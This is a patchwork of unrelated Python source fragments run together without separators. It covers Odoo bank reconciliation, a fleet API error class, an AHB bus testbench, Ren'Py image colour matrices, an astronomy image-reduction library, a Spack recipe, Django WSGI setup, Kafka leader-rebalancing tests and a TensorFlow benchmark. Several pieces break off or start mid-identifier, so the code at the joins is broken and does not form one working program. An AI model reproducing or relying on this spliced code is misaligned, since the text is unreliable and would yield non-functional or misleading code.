.Many2one('account.bank.statement', string='Statement', index=True, required=True, ondelete='cascade') journal_id = fields.Many2one('account.journal', related='statement_id.journal_id', string='Journal', store=True, readonly=True) partner_name = fields.Char(help="This field is used to record the third party name when importing bank statement in electronic format," " when the partner doesn't exist yet in the database (or cannot be found).") ref = fields.Char(string='Reference') note = fields.Text(string='Notes') sequence = fields.Integer(index=True, help="Gives the sequence order when displaying a list of bank statement lines.", default=1) company_id = fields.Many2one('res.company', related='statement_id.company_id', string='Company', store=True, readonly=True) journal_entry_ids = fields.One2many('account.move', 'statement_line_id', 'Journal Entries', copy=False, readonly=True) amount_currency = fields.Monetary(help="The amount expressed in an optional other currency if it is a multi-currency entry.") currency_id = fields.Many2one('res.currency', string='Currency', help="The optional other currency if it is a multi-currency entry.") @api.one @api.constrains('amount') def _check_amount(self): # This constraint could possibly underline flaws in bank statement import (eg. 
inability to # support hacks such as using dummy transactions to give additional informations) if self.amount == 0: raise ValidationError(_('A transaction can\'t have a 0 amount.')) @api.one @api.constrains('amount', 'amount_currency') def _check_amount_currency(self): if self.amount_currency != 0 and self.amount == 0: raise ValidationError(_('If "Amount Currency" is specified, then "Amount" must be as well.')) @api.multi def unlink(self): for line in self: if line.journal_entry_ids.ids: raise UserError(_('In order to delete a bank statement line, you must first cancel it to delete related journal items.')) return super(AccountBankStatementLine, self).unlink() @api.model def _needaction_domain_get(self): return [('journal_entry_ids', '=', False), ('account_id', '=', False)] @api.multi def button_cancel_reconciliation(self): # TOCKECK : might not behave as expected in case of reconciliations (match statement line with already # registered payment) or partial reconciliations : it will completely remove the existing payment. 
move_recs = self.env['account.move'] for st_line in self: move_recs = (move_recs | st_line.journal_entry_ids) if move_recs: for move in move_recs: move.line_ids.remove_move_reconcile() move_recs.write({'statement_line_id': False}) move_recs.button_cancel() move_recs.unlink() #################################################### # Reconciliation interface methods #################################################### @api.multi def get_data_for_reconciliation_widget(self, excluded_ids=None): """ Returns the data required to display a reconciliation widget, for each statement line in self """ excluded_ids = excluded_ids or [] ret = [] for st_line in self: aml_recs = st_line.get_reconciliation_proposition(excluded_ids=excluded_ids) target_currency = st_line.currency_id or st_line.journal_id.currency_id or st_line.journal_id.company_id.currency_id rp = aml_recs.prepare_move_lines_for_reconciliation_widget(target_currency=target_currency, target_date=st_line.date) excluded_ids += [move_line['id'] for move_line in rp] ret.append({ 'st_line': st_line.get_statement_line_for_reconciliation_widget(), 'reconciliation_proposition': rp }) return ret def get_statement_line_for_reconciliation_widget(self): """ Returns the data required by the bank statement reconciliation widget to display a statement line """ statement_currency = self.journal_id.currency_id or self.journal_id.company_id.currency_id if self.amount_currency and self.currency_id: amount = self.amount_currency amount_currency = self.amount amount_currency_str = amount_currency > 0 and amount_currency or -amount_currency amount_currency_str = formatLang(self.env, amount_currency_str, currency_obj=statement_currency) else: amount = self.amount amount_currency_str = "" amount_str = formatLang(self.env, abs(amount), currency_obj=self.currency_id or statement_currency) data = { 'id': self.id, 'ref': self.ref, 'note': self.note or "", 'name': self.name, 'date': self.date, 'amount': amount, 'amount_str': amount_str, # Amount 
in the statement line currency 'currency_id': self.currency_id.id or statement_currency.id, 'partner_id': self.partner_id.id, 'journal_id': self.journal_id.id, 'statement_id': self.statement_id.id, 'account_code': self.journal_id.default_debit_account_id.code, 'account_name': self.journal_id.default_debit_account_id.name, 'partner_name': self.partner_id.name, 'communication_partner_name': self.partner_name, 'amount_currency_str': amount_currency_str, # Amount in the statement currency 'has_no_partner': not self.partner_id.id, } if self.partner_id: if amount > 0: data['open_balance_account_id'] = self.partner_id.property_account_receivable_id.id else: data['open_balance_account_id'] = self.partner_id.property_account_payable_id.id return data @api.multi def get_move_lines_for_reconciliation_widget(self, excluded_ids=None, str=False, offset=0, limit=None): """ Returns move lines for the bank statement reconciliation widget, formatted as a list of dicts """ aml_recs = self.get_move_lines_for_reconciliation(excluded_ids=excluded_ids, str=str, offset=offset, limit=limit) target_currency = self.currency_id or self.journal_id.currency_id or self.journal_id.company_id.currency_id return aml_recs.prepare_move_lines_for_reconciliation_widget(target_currency=target_currency, target_date=self.date) #################################################### # Reconciliation methods #################################################### def get_move_lines_for_reconciliation(self, excluded_ids=None, str=False, offset=0, limit=None, additional_domain=None, overlook_partner=False): """ Return account.move.line records which can be used for bank statement reconciliation. :param excluded_ids:
class APIError(Exception): """Represents an error returned in a response to a fleet API call This exception will be raised any time a response code >= 400 is returned Attributes: code (int): The response code message(str): The message included with the error response http_error(googleapiclient.errors.HttpError): The underlying exception that caused this exception to be raised
If you need access to the raw response, this is where you'll find it. """ def __init__(self, code, message, http_error): """Construct an exception representing an error returned by fleet Args: code (int): The response code message(str): The message included with the error response http_error(googleapic
lient.errors.HttpError): The underlying exception that caused this exception to be raised. """ self.code = code self.message = message self.http_error = http_error def __str__(self): # Return a string like r'Some bad thing happened(400)' return '{1} ({0})'.format( self.code, self.message ) def __repr__(self): # Retun a string like r'<Fleetv1Error; Code: 400; Message: Some bad thing happened>' return '<{0}; Code: {1}; Message: {2}>'.format( self.__class__.__name__, self.code, self.message )
# Copyright (C) 2018, Yu Sheng Lin, johnjohnlys@media.ee.ntu.edu.tw # This file is part of Nicotb. # Nicotb is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # Nicotb is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # You should have received a copy of the GNU General Public License # along with Nicotb. If not, see <http://www.gnu.org/licenses/>. from nicotb import * from nicotb.utils import Scoreboard, BusGetter from nicotb.protocol import Ahb import operator as op import numpy as np from os import getenv def main(): N = 10 scb = Scoreboard() test = scb.GetTest("ahb", ne=op.ne, max_err=10) bg = BusGetter(callbacks=[test.Get]) ms = Ahb.Master(hsel, haddr, hwrite, htrans, hsize, hburst, hready, hresp, rd, wd, ck_ev) yield rs_ev for i in range(10): yield ck_ev def rng(magic): while True: magic = (magic*199 + 12345) & 65535 yield magic r = rng(25251) MAGIC = next(r) ADR = 0 print( "Test Single R/W\n" f"MAGIC/ADR is {MAGIC}/{ADR}" ) test.Expect(MAGIC) yield from ms.Write(ADR, MAGIC) read_v = yield from ms.Read(ADR) test.Get(read_v) yield ck_ev MAGIC = next(r) ADR = 100 print( "Test Pipelined R/W\n" f"MAGIC/ADR is {MAGIC}/{ADR}" ) wcmd = [(True, ADR+i*4, MAGIC+i) for i in range(N)] rcmd = [(False, ADR+i*4) for i in range(N)] test.Expect([MAGIC+i for i in range(N)]) read_v = yield fr
om ms.IssueCommands(wcmd + rcmd) test.Get(read_v) yield ck_ev MAGIC = next(r) ADR = 200 print( "Test Pipelined Interleaved R/W\n" f"MAGIC/ADR is {MAGIC}/{ADR}" ) wcmd = [(True, ADR+i*4, MAGIC+i) for i in range(N)] rcmd = [(False, ADR+i*4) for i in range(N)] cmd = [v for p in zip(wcmd, rcmd) for v in p] test.Expect([MAGIC+i for i in range(N)]) read_v = yield from ms.IssueCommands(cmd) test.Get(read_v) for i in range(10): yield ck_ev wd, rd = CreateBu
ses([("wd",), ("rd",),]) hsel, haddr, hwrite, htrans, hsize, hburst, hready, hresp = CreateBuses([ (("u_dut", "HSEL"),), (("u_dut", "HADDR"),), (("u_dut", "HWRITE"),), (("u_dut", "HTRANS"),), (("u_dut", "HSIZE"),), (("u_dut", "HBURST"),), (("u_dut", "HREADY"),), (("u_dut", "HRESP"),), ]) ck_ev, rs_ev = CreateEvents(["ck_ev", "rst_out",]) RegisterCoroutines([ main(), ])
# Copyright 2012 Nebula, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # u
nder the License. from django import template from horizon.utils import html class Breadcrumb(html.HTMLElement): def __init__(self, request, template, root, subfolder_path, url, attr=None): super(Breadcrumb, self).__init__() self.template = template self.request = request self.root = root self.subfolder_path = subfolder_path self.url = url self._subfolders = [] def get_subfolders(self): if self.subfolder_path and not self._subfolders: (parent, slash, folder) = self.subfolder_path.strip('/') \ .rpartition('/') while folder: path = "%s%s%s/" % (parent, slash, folder) self._subfolders.insert(0, (folder, path)) (parent, slash, folder) = parent.rpartition('/') return self._subfolders def render(self): """Renders the table using the template from the table options.""" breadcrumb_template = template.loader.get_template(self.template) extra_context = {"breadcrumb": self} context = template.RequestContext(self.request, extra_context) return breadcrumb_template.render(context)
t character has the value end. Such a ramp can be used as a map argument of im.Map. """ rv = ramp_cache.get((start, end), None) if rv is None: chars = [ ] for i in range(0, 256): i = i / 255.0 chars.append(chr(int( end * i + start * (1.0 - i) ) ) ) rv = "".join(chars) ramp_cache[start, end] = rv return rv identity = ramp(0, 255) class Map(ImageBase): """ This adjusts the colors of the image that is its child. It takes as arguments 4 256 character strings. If a pixel channel has a value of 192, then the value of the 192nd character in the string is used for the mapped pixel component. """ def __init__(self, im, rmap=identity, gmap=identity, bmap=identity, amap=identity, force_alpha=False, **properties): im = image(im) super(Map, self).__init__(im, rmap, gmap, bmap, amap, force_alpha, **properties) self.image = im self.rmap = rmap self.gmap = gmap self.bmap = bmap self.amap = amap self.force_alpha = force_alpha def get_mtime(self): return self.image.get_mtime() def load(self): surf = cache.get(self.image) rv = renpy.display.pgrender.surface(surf.get_size
(), True) renpy.display.module.map(surf, rv, self.rmap, self.gmap, self.bmap, self.amap) return rv def predict_files(self): return self.image.predict_files() class Twocolor(Imag
eBase): """ This takes as arguments two colors, white and black. The image is mapped such that pixels in white have the white color, pixels in black have the black color, and shades of gray are linearly interpolated inbetween. The alpha channel is mapped linearly between 0 and the alpha found in the white color, the black color's alpha is ignored. """ def __init__(self, im, white, black, force_alpha=False, **properties): white = renpy.easy.color(white) black = renpy.easy.color(black) im = image(im) super(Twocolor, self).__init__(im, white, black, force_alpha, **properties) self.image = im self.white = white self.black = black self.force_alpha = force_alpha def get_mtime(self): return self.image.get_mtime() def load(self): surf = cache.get(self.image) rv = renpy.display.pgrender.surface(surf.get_size(), True) renpy.display.module.twomap(surf, rv, self.white, self.black) return rv def predict_files(self): return self.image.predict_files() class Recolor(ImageBase): """ This adjusts the colors of the image that is its child. It takes as an argument 4 numbers between 0 and 255, and maps each channel of the image linearly between 0 and the supplied color. """ def __init__(self, im, rmul=255, gmul=255, bmul=255, amul=255, force_alpha=False, **properties): im = image(im) super(Recolor, self).__init__(im, rmul, gmul, bmul, amul, force_alpha, **properties) self.image = im self.rmul = rmul + 1 self.gmul = gmul + 1 self.bmul = bmul + 1 self.amul = amul + 1 self.force_alpha = force_alpha def get_mtime(self): return self.image.get_mtime() def load(self): surf = cache.get(self.image) rv = renpy.display.pgrender.surface(surf.get_size(), True) renpy.display.module.linmap(surf, rv, self.rmul, self.gmul, self.bmul, self.amul) return rv def predict_files(self): return self.image.predict_files() class MatrixColor(ImageBase): """ :doc: im_matrixcolor An image operator that uses `matrix` to linearly transform the image manipulator `im`. 
`Matrix` should be a list, tuple, or :func:`im.matrix` that is 20 or 25 elements long. If the object has 25 elements, then elements past the 20th are ignored. When the four components of the source color are R, G, B, and A, which range from 0.0 to 1.0; the four components of the transformed color are R', G', B', and A', with the same range; and the elements of the matrix are named:: [ a, b, c, d, e, f, g, h, i, j, k, l, m, n, o, p, q, r, s, t ] the transformed colors can be computed with the formula:: R' = (a * R) + (b * G) + (c * B) + (d * A) + e G' = (f * R) + (g * G) + (h * B) + (i * A) + j B' = (k * R) + (l * G) + (m * B) + (n * A) + o A' = (p * R) + (q * G) + (r * B) + (s * A) + t The components of the transformed color are clamped to the range [0.0, 1.0]. """ def __init__(self, im, matrix, **properties): im = image(im) if len(matrix) != 20 and len(matrix) != 25: raise Exception("ColorMatrix expects a 20 or 25 element matrix, got %d elements." % len(matrix)) matrix = tuple(matrix) super(MatrixColor, self).__init__(im, matrix, **properties) self.image = im self.matrix = matrix def get_mtime(self): return self.image.get_mtime() def load(self): surf = cache.get(self.image) rv = renpy.display.pgrender.surface(surf.get_size(), True) renpy.display.module.colormatrix(surf, rv, self.matrix) return rv def predict_files(self): return self.image.predict_files() class matrix(tuple): """ :doc: im_matrixcolor Constructs an im.matrix object from `matrix`. im.matrix objects support The operations supported are matrix multiplication, scalar multiplication, element-wise addition, and element-wise subtraction. These operations are invoked using the standard mathematical operators (\\*, \\*, +, and -, respectively). If two im.matrix objects are multiplied, matrix multiplication is performed, otherwise scalar multiplication is used. `matrix` is a 20 or 25 element list or tuple. 
If it is 20 elements long, it is padded with (0, 0, 0, 0, 1) to make a 5x5 matrix, suitable for multiplication. """ def __new__(cls, *args): if len(args) == 1: args = tuple(args[0]) if len(args) == 20: args = args + (0, 0, 0, 0, 1) if len(args) != 25: raise Exception("Matrix expects to be given 20 or 25 entries, not %d." % len(args)) return tuple.__new__(cls, args) def mul(self, a, b): if not isinstance(a, matrix): a = matrix(a) if not isinstance(b, matrix): b = matrix(b) result = [ 0 ] * 25 for y in range(0, 5): for x in range(0, 5): for i in range(0, 5): result[x + y * 5] += a[x + i * 5] * b[i + y * 5] return matrix(result) def scalar_mul(self, other): other = float(other) return matrix([ i * other for i in self ]) def vector_mul(self, o): return (o[0]*self[0] + o[1]*self[1] + o[2]*self[2] + o[3]*self[3] + self[4], o[0]*self[5] + o[1]*self[6] + o[2]*self[7] + o[3]*self[8] + self[9], o[0]*self[10] + o[1]*self[11] + o[2]*self[12] + o[3]*self[13] + self[14], o[0]*self[15] + o[1]*self[16] + o[2]*self[17] + o[3]*self[18] + self[19], 1) def __add__(self, other): if isinstance(other, (int, float)): other = float(other) return matrix([ i + other for i in self ]) other = matrix(other) return matrix([ i + j for i, j in zip(self, other)]) __radd__ = __add__ def __sub__(self, other): return self + other * -1 def __rsub__(self, other): return self * -1 + other def __mul__(self, other): if isinstance(other, (int, float)): return self.scalar_mul(other) return
#!/usr/bin/python # -*- coding: UTF-8 -*- """ Criado em 19 de Novembro de 2016 @author: Denis Varise Bernardes & Eder Martioli Descricao: esta biblioteca possui as seguintes funcoes: mkDir_saveCombinedImages: pela chamada da funcao LeArquivoReturnLista retorna a lista de todas as imagens adquiridas no ensaio; realiza a subtração entre cada par de imagens, salvando o resultado em um novo diretório 'Imagens_reduzidas' . Feito isso, a funcao cria uma lista com o nomes das novas imagens atraves da chamada da funcao criaArquivo_listaImagensCombinadas. readArqDetector: esta funcao recebe o nome do arquivo contendo os PAR2s do detector, retornando um vetor com os valores medidos. ImagemUnica_returnHeader: esta funcao recebe uma unica imagem da lista, retornando o header para a retirada de informacoes. LeArquivoReturnLista: esta funcao faz a leitura do arquivo listaImagens gerado pela funcao criaArq_listaImgInput, retornando uma lista com o nome das imagens. criaArquivo_listaImagensCombinadas: esta funcao cria um arquivo chamado listaImagensCombinadas contendo o nome das imagens combinadas geradas na funcao mkDir_saveCombinedImages. LeArqFluxoCamera: esta funcao faz a leitura do arquivo Fluxo camera.dat gerado pela funcao criaArqFluxoCamera, retornado dois vetores com os valores do fluxo e dos desvio padrao. LeArq_curvaCalibDetector: PAR2 o nome do arquivo da curva de calibracao do detector e o numero do conjunto de imagens, esta funcao retornara um vetor contendo os valores da curva caso a opcao seja fornecida; caso contrario, a funcao retorna um vetor contendo o valor 1. Laboratorio Nacional de Astrofisica, Brazil. """ __version__ = "1.0" __copyright__ = """ Copyright (c) ... All rights reserved. 
""" import astropy.io.fits as fits import numpy as np import os from sys import exit from math import sqrt from geraArquivo import geraArquivo def mkDir_saveCombinedImages(nImages, images_dir): print('Criando diretorio: Mediana das Imagens') #recebe uma lista de imagens de retorna um diretorio com as imagens combinadas lista = LeArquivoReturnLista('listaImagens', images_dir) n, i = 0, 0 VetorImagens = [] for i in range(len(lista)): if i%nImages == nImages-1: imagem = fits.getdata(images_dir + '\\' + lista[i]) VetorImagens.append(imagem) os.chdir(chdir) geraArquivo(VetorImagens, n) os.chdir(cwd) VetorImagens = [] n+=1 else: imagem = fits.getdata(images_dir + '\\' + lista[i]) VetorImagens.append(image
m) criaArquivo_listaImag
ensReduzidas() return def mkDir_ImgPair(tagPAR2, tagPAR1, ganho, images_dir): print('Criando diretorio: Imagens reduzidas') if not os.path.exists(images_dir + '\\' + 'Imagens_reduzidas'): os.makedirs(images_dir + '\\' + 'Imagens_reduzidas') chdir = images_dir + '\\' + 'Imagens_reduzidas' #recebe uma lista de imagens de retorna um diretorio com as imagens reduzidas de raios cosmicos e erro do shutter listaPAR2 = LeArquivoReturnLista(tagPAR2+'List.txt', images_dir) listaPAR1 = LeArquivoReturnLista(tagPAR1+'List.txt', images_dir) VetorImagens = [[],[]] i,n, string, VetorStdSignal = 0, 0, '', [] for i in range(len(listaPAR2)): imagemPAR2 = fits.getdata(images_dir + '\\' + listaPAR2[i])[0].astype(float) imagemPAR1 = fits.getdata(images_dir + '\\' + listaPAR1[i])[0].astype(float) imgReducePAR = imagemPAR2 - imagemPAR1 VetorStdSignal.append(sqrt(sum(sum(imagemPAR2 + imagemPAR1))*ganho)) os.chdir(chdir) if n < 10: string = '00%i'%(n) if 10 <= n < 100: string = '0%i'%(n) if n >= 100: string = '%i'%(n) print('ImagemReduzida%s.fits'%(string)) fits.writeto('ImagemReduzida_%s.fits'%(string),imgReducePAR, overwrite=True) os.chdir(images_dir) VetorImagens = [[],[]] n+=1 criaArquivo_StdDiffImagens(VetorStdSignal, images_dir) criaArquivo_listaImagensReduzidas(images_dir) return def readArqDetector(name, images_dir): valores=[] with open(images_dir + '\\' + name) as arq: Strvalores = arq.read().splitlines() for valor in Strvalores[1:]: valores.append(float(valor)) arq.close() return valores def ImagemUnica_returnHeader(tagPAR2, images_path): with open(images_path + '\\' + tagPAR2+'List.txt') as arq: imagem = arq.read().splitlines()[0].split(',')[0] arq.close() header = fits.getheader(images_path + '\\' + imagem) return header def LeArquivoReturnLista(arquivo, images_path): with open(images_path + '\\' + arquivo) as arq: lista = [] linhas = arq.read().splitlines() for lin in linhas: for img in lin.split(','): lista.append(img) arq.close() return lista def 
criaArquivo_listaImagensReduzidas(images_path): nome = images_path + '\Imagens_reduzidas\listaImagensReduzidas' try: File = open(nome,'w') except: nome.remove() File = open(nome,'w') listaImagemCombinada = os.listdir(images_path + '\Imagens_reduzidas') listaImagemCombinada.sort() for img in listaImagemCombinada: if '.fits' in img: File.write(img+'\n') File.close() def criaArquivo_StdDiffImagens(vetorStd, images_path): nome = images_path + '\\' + 'StdDiffImages' try: arq = open(nome,'w') except: nome.remove() arq = open(nome,'w') arq.write('-Desvio padrao das imagens reduzidas:\n') for std in vetorStd: arq.write(' \t\t ' + str(std) + '\n') arq.close() def LeArqFluxoCamera(images_path): vetorFluxoCamera, vetorSigmaBackground_Signal = [],[] with open(images_path + '\\' + 'Fluxo camera.dat') as arq: listaValores = arq.read().splitlines() for linha in listaValores[1:]: Fluxo_e_Sigma = linha.split('\t\t\t') vetorFluxoCamera.append(float(Fluxo_e_Sigma[0])) vetorSigmaBackground_Signal.append(float(Fluxo_e_Sigma[1])) return vetorFluxoCamera, vetorSigmaBackground_Signal def LeArq_curvaCalibFiltroDensidade(nome, numeroImagens, images_path): VetorPAR2s=[] if nome != '': with open(images_path + '\\' + nome) as arq: linhas = arq.read().splitlines() arq.close() for PAR2 in linhas[1:]: if PAR2 == '':continue VetorPAR2s.append(float(PAR2)) else: for i in range(numeroImagens): VetorPAR2s.append(1) return VetorPAR2s def LeArq_curvaEQFabricante(name, images_path): espectro, vetorEQ = [], [] with open(images_path + '\\' + name) as arq: linhas = arq.read().splitlines() arq.close() for linha in linhas: if linha == '':continue valores = linha.split('\t') espectro.append(float(valores[0])) vetorEQ.append(float(valores[1])) return vetorEQ, espectro
import os from .PBX_Base_Reference import * from ...Helpers import path_helper class PBXLibraryReference(PBX_Base_Reference): def __init__(self, lookup_func, dictionary, project, identifier): super(PBXLibraryReference, self).__init__(lookup_func, dictionary, project, identifier);
############################################################################## # Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC. # Produced at the Lawrence Livermore National Laboratory. # # This file is part of Spack. # Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved. # LLNL-CODE-647188 # # For details, see
https://github.com/llnl/spack # Please also see the NOTICE and LICENSE files for our notice and the LGPL. # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License (as # published by the Free Software Founda
tion) version 2.1, February 1999. # # This program is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and # conditions of the GNU Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this program; if not, write to the Free Software # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA ############################################################################## from spack import * class Fastqvalidator(MakefilePackage): """The fastQValidator validates the format of fastq files.""" homepage = "http://genome.sph.umich.edu/wiki/FastQValidator" url = "https://github.com/statgen/fastQValidator/archive/v0.1.1a.tar.gz" version('2017-01-10', commit='6d619a34749e9d33c34ef0d3e0e87324ca77f320', git='https://github.com/statgen/fastQValidator.git') resource( name='libStatGen', git='https://github.com/statgen/libStatGen.git', commit='9db9c23e176a6ce6f421a3c21ccadedca892ac0c' ) @property def build_targets(self): return ['LIB_PATH_GENERAL={0}'.format( join_path(self.stage.source_path, 'libStatGen'))] @property def install_targets(self): return [ 'INSTALLDIR={0}'.format(self.prefix.bin), 'LIB_PATH_GENERAL={0}'.format( join_path(self.stage.source_path, 'libStatGen')), 'install' ]
""" WSGI config for server project. It ex
poses the WSGI callable as a module-level variable named ``application``. For more information on this file, see https://docs.djangoproject.com/en/1.7/howto/deployment/wsgi/ """ import os os.environ.setdefault("DJANGO_SETTINGS_MODULE", "server.settings") from django.core.wsgi import get_wsgi_application application = get_ws
gi_application()
00000
0 output
/lattice.py.err 32074 1 output/lattice.py.out
# Verify leader-balanced assert new_leader_imbal == 0 # Verify partitions-changed assignment assert new_leaders_per_broker['0'] == 1 assert new_leaders_per_broker['1'] == 1 assert new_leaders_per_broker['2'] == 1 def test_rebalance_leaders_unbalanced_case2( self, create_balancer, create_cluster_topology, ): # (Broker: leader-count): {0: 2, 1: 1, 2:0} # opt-count: 3/3 = 1, extra-count = 0 # Leader-imbalance-value: 1 assignment = dict( [ ((u'T0', 0), ['1', '2']), ((u'T1', 1), ['0', '1']), ((u'T1', 0), ['0']), ] ) ct = create_cluster_topology(assignment, broker_range(3)) cb = create_balancer(ct) cb.rebalance_leaders() # Verify leader-balanced leader_imbal = get_net_imbalance( get_broker_leader_counts(ct.brokers.values()), ) assert leader_imbal == 0 def test_rebalance_leaders_unbalanced_case2a( self, create_balancer, create_cluster_topology, ): # (Broker: leader-count): {0: 2, 1: 1, 2:0, 3:1} # opt-count: 3/4 = 1, extra-count = 3 # Leader-imbalance-value: 1 # imbalanced-broker: 0,2; balanced-brokers: 1,3 assignment = dict( [ ((u'T0', 0), ['3', '2']), ((u'T0', 1), ['1', '3']), ((u'T1', 1), ['0', '1']), ((u'T1', 0), ['0']), ] ) ct = create_cluster_topology(assignment, broker_range(4)) cb = create_balancer(ct) cb.rebalance_leaders() # Verify balanced leader_imbal = get_net_imbalance( get_broker_leader_counts(ct.brokers.values()), ) assert leader_imbal == 0 # Verify that (T0, 1) also swapped even if 1 and 3 were balanced # Rebalancing through non-followers replica_ids = [b.id for b in ct.partitions[('T0', 1)].replicas] assert replica_ids == ['3', '1'] def test_rebalance_leaders_unbalanced_case2b( self, create_balancer, create_cluster_topology, ): assignment = dict( [ ((u'T0', 0), ['3', '2']), ((u'T1', 0), ['1', '2']), ((u'T1', 1), ['0', '1']), ((u'T2', 0), ['0']), ] )
ct = create_cluster_topology
(assignment, broker_range(4)) cb = create_balancer(ct) cb.rebalance_leaders() # Verify balanced leader_imbal = get_net_imbalance( get_broker_leader_counts(ct.brokers.values()), ) assert leader_imbal == 0 def test_rebalance_leaders_unbalanced_case2c( self, create_balancer, create_cluster_topology, ): # Broker-2 imbalance value: 2 with different brokers # Broker-2 requests leadership from multiple brokers (0, 1) once assignment = dict( [ ((u'T1', 0), ['1', '2']), ((u'T1', 1), ['0', '1']), ((u'T2', 0), ['0']), ((u'T2', 1), ['0']), ((u'T3', 0), ['3', '2']), ((u'T3', 1), ['1', '3']), ((u'T4', 0), ['1']), ((u'T4', 2), ['3']), ] ) ct = create_cluster_topology(assignment, broker_range(4)) cb = create_balancer(ct) cb.rebalance_leaders() # Verify leader-balanced leader_imbal = get_net_imbalance( get_broker_leader_counts(ct.brokers.values()), ) assert leader_imbal == 0 def test_rebalance_leaders_unbalanced_case2d( self, create_balancer, create_cluster_topology, ): # Broker-2 imbalanced with same brokers # Broker-2 requests leadership from same broker-1 twice assignment = dict( [ ((u'T1', 0), ['1', '2']), ((u'T1', 1), ['0', '1']), ((u'T1', 2), ['0']), ((u'T1', 3), ['1', '2']), ((u'T1', 4), ['0', '1']), ((u'T1', 5), ['0']), ] ) ct = create_cluster_topology(assignment, broker_range(3)) cb = create_balancer(ct) cb.rebalance_leaders() # Verify leader-balanced leader_imbal = get_net_imbalance( get_broker_leader_counts(ct.brokers.values()), ) assert leader_imbal == 0 def test_rebalance_leaders_unbalanced_case2e( self, create_balancer, create_cluster_topology, ): # Imbalance-val 2 # Multiple imbalanced brokers (2, 5) gets non-follower balanced # from multiple brokers (1,4) assignment = dict( [ ((u'T1', 0), ['1', '2']), ((u'T1', 1), ['0', '1']), ((u'T2', 0), ['0']), ((u'T3', 0), ['4', '5']), ((u'T3', 1), ['3', '4']), ((u'T4', 0), ['3']), ] ) ct = create_cluster_topology(assignment, broker_range(6)) cb = create_balancer(ct) cb.rebalance_leaders() # Verify leader-balanced leader_imbal = 
get_net_imbalance( get_broker_leader_counts(ct.brokers.values()), ) assert leader_imbal == 0 def test_rebalance_leaders_unbalanced_case3( self, create_balancer, create_cluster_topology, ): # Imbalanced 0 and 2. No re-balance possible. assignment = dict( [ ((u'T1', 0), ['1', '2']), ((u'T1', 1), ['0']), ((u'T2', 0), ['0']), ] ) ct = create_cluster_topology(assignment, broker_range(3)) cb = create_balancer(ct) cb.rebalance_leaders() # Verify still leader-imbalanced leader_imbal = get_net_imbalance( get_broker_leader_counts(ct.brokers.values()), ) assert leader_imbal == 1 # No change in assignment assert sorted(ct.assignment) == sorted(assignment) def test_rebalance_leaders_unbalanced_case4( self, create_balancer, create_cluster_topology, ): # Imbalanced assignment # Partial leader-imbalance possible # (Broker: leader-count): {0: 3, 1: 1, 2:0} # opt-count: 5/3 = 1, extra-count = 2 assignment = dict( [ ((u'T0', 0), ['1', '2']), ((u'T0', 1), ['0', '2']), ((u'T1', 0), ['0']), ((u'T1', 1), ['0']), ((u'T1', 2), ['0']), ] ) ct = create_cluster_topology(assignment, broker_range(3)) net_imbal = get_net_imbalance( get_broker_leader_counts(ct.brokers.values()), ) cb = create_balancer(ct) cb.rebalance_leaders() new_leaders_per_broker = { broker.id: broker.count_preferred_replica() for broker in ct.brokers.itervalues() } new_net_imbal = get_net_imbalance(new_leaders_per_broker.values()) # Verify that net-imbalance has reduced but not zero assert new_net_imbal > 0 and new_net_imbal < net_imbal # Verify the changes in leaders-per-broker count assert new_leaders_per_broker['2'] == 1 assert new_leaders_per_broker['1'] == 1 assert new_leaders_per_broker['0'] == 3 def test_rebalance_leaders_unbalanced_case2f( self, create_balancer, create_cluster_topology, ): assignment = dict( [ ((u'T0', 0), ['2', '0']), ((u'T1', 0), ['2', '0']), ((u'T1', 1), ['0']), ((u'T2', 0), ['1']), ((u'T2', 1), ['2']), ] ) ct = create_cluster_topology(assignment, broker_range(3)) cb = create_balancer(c
# Copyright 2020 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== # Lint as: python3 r"""Micro benchmark.
bazel run -c opt --config=cuda \ //third_party/tensorflow/python/ops/numpy_ops/benchmarks:micro_benchmarks -- \ --number=100 --repeat=100 \ --benchmarks=. """ from __future__ import absolute_import fro
m __future__ import division from __future__ import print_function import gc import time from absl import flags from absl import logging import numpy as np # pylint: disable=unused-import import tensorflow.compat.v2 as tf from tensorflow.python.ops import numpy_ops as tfnp # pylint: disable=g-direct-tensorflow-import from tensorflow.python.ops.numpy_ops.integration_test.benchmarks import numpy_mlp from tensorflow.python.ops.numpy_ops.integration_test.benchmarks import tf_numpy_mlp FLAGS = flags.FLAGS flags.DEFINE_integer('repeat', 100, '#Measurements per benchmark.') flags.DEFINE_integer('number', 100, '#Runs per a measure.') class MicroBenchmarks(tf.test.Benchmark): """Main micro benchmark class.""" def _benchmark_and_report( self, name, fn, repeat=None, number=None): """Run fn repeat * number times, report time, and return fastest time.""" # Can't make these default above since the flags may not have been parsed # at module import time. repeat = repeat or int(FLAGS.repeat) number = number or int(FLAGS.number) # Warmup fn() times = [] for _ in range(repeat): gc.disable() start = time.time() for _ in range(number): fn() times.append(time.time() - start) gc.enable() gc.collect() # Regular benchmark to report numbers. 
